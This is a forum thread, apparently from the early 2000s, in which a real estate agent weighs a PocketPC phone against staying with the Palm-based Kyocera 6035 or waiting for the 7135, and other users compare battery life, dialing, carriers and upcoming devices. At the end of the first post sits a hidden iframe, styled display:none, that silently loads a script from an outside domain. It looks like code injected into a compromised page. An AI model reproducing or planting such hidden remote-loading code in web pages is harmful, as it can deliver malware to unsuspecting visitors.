I first want to make it clear that I am a big Palm fan and always have been. I don't know a lot about Pocket PC, but just show the Microsoft's Insider Live on TechTV and they showcased the new PocketPC phone. It seemed very fast and easy to use. The guy showing it off took a call from someone, put them on hold, checked and email, followed a link within the email to PocketPC iexplorer, made a different call, then conferenced the two. All this while watching a video in the background. I am a real estate agent and have found my 6035 to be very helpful in the field. My only complaints are the BW screen and the display size. This PocketPC phone has a bigger screen and has all of PocketPC's Office stuff incorporated. Does anyone think that I would benefit more from using this phone as opposed to the new 7135. The types of things I do on my current 6035 are email on the road, edit word docs and email them to clients and browse the current listing available on a website using Blazer which is very slow. Any suggestion or guidance would be helpful. Remember, I do like Palm, I just want what would be best for me. A list of Pros and Cons of PocketPC vs. Palm would be helpful.
Thanks for your help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

but? Ok, let's stop it right there. You're out of here. The tribe has spoken! :smash
Nah... just funnin' with ya! I can't really add much to nomad's insightful comments. It's true... there are pros and cons to both sides. It can't be denied that the PPC platform is a better alternative for some. But.... I get the feeling that as a real estate agent you are probably on the phone much more than you are using the PDA side of the 6035. You'd better think about how it would impact you to have to use a virtual number pad for dialing... not to mention the decreased battery life! (1.5 hours vs. 3.5). I'm not trying to say that the 7135 is best for everyone... but for a real estate agent it seems that a device that is phone first, PDA second would be preferable.
And did I mention that the 7135 is the best designed smartphone we have ever seen???
Let us know what direction you decide to go! I have played with the smartphone you're talking about... it's pretty cool (that reminds me... don't forget about coverage!!! T-Mobile ain't all that great!).

That was a great point Robert K.. I do tend to use the phone much more than the PDA. I'm sure I'll stay with the palm. Hell, if I was really going to go the PCC, I would have done it when the IPAQ came out. I guess I'm just getting tired of the BW display of my 6035 and frustrated with the delay of the 7135. I don't want to wait any longer and I sure as heck don't want to wait until 2003. This sucks.
Thanks again for getting me back on the right path.

A friend of mine has one of those PPCPE phones. He likes it. I need to keep my same phone number (Verizon) so it's as if the phone doesn't exist for me. The thera totally is out of the question because it's standby time won't even last a whole work day. The Samsung smartphones coming out are advertised to have camera options so you might wait and checkout the i330, i500, etc.
As for office docs, I understand pocket word is pretty limited. A company in Germany is working on more functional word processor, but then again there are functional word processors in the palm area that sync with msword as well.
Yeah, I looked into that one before - a smaller version of the Thera actually, but seems nice. It's more on the PDA side, than phone side however and doesn't seem to integrate the phone/PDA functions as nicely as the 6035/7135 Smartphones IMHO. The new Nokia Communicator is also pretty nice, but has its own OS.
Hewlett PaQ-ard is supposed to be releasing new iPaqs sometime in the near future. These new models will support voice over GSM/GPRS and CDMA networks. If and when this happens it could be a serious contender for the must have smartphone position.
Frankly, this and the 7135 threads show the problem with working the SmartPhone space at this moment in time. Things are evolving so quickly, any buyer is pretty much guaranteed to be left behind 6 months after purchase. That is the beauty of the 6035. It was alone when it came out (or nearly so, not sure I count the Motorola v200 in the same league) so there is a huge installed base of existing users to keep it alive. This forum will be alive and well for a long time, if only for that reason.

I created a topic in the Palm OS board about that website.

On his website, he mentions how much he loves "AcidImage" for viewing pics, etc. and that it can view pics right off of a memory card taken right out of the camera without new formating, etc.

Now, if someone could incorporate a phone into this unit, it would be the killer Smartphone! :alieneyes
Yep, no doubt.... BUT keep in mind that the NX70V will be out shortly, with Palm OS 5! And of course it still wouldn't be phone-centric... but if you put a dial pad on the outside of the NX70V and a LCD screen and speaker it could be used as a phone without opening it.

Are there any sites that describe the NC70V? I'd be interested in seeing what its features are. TIA.
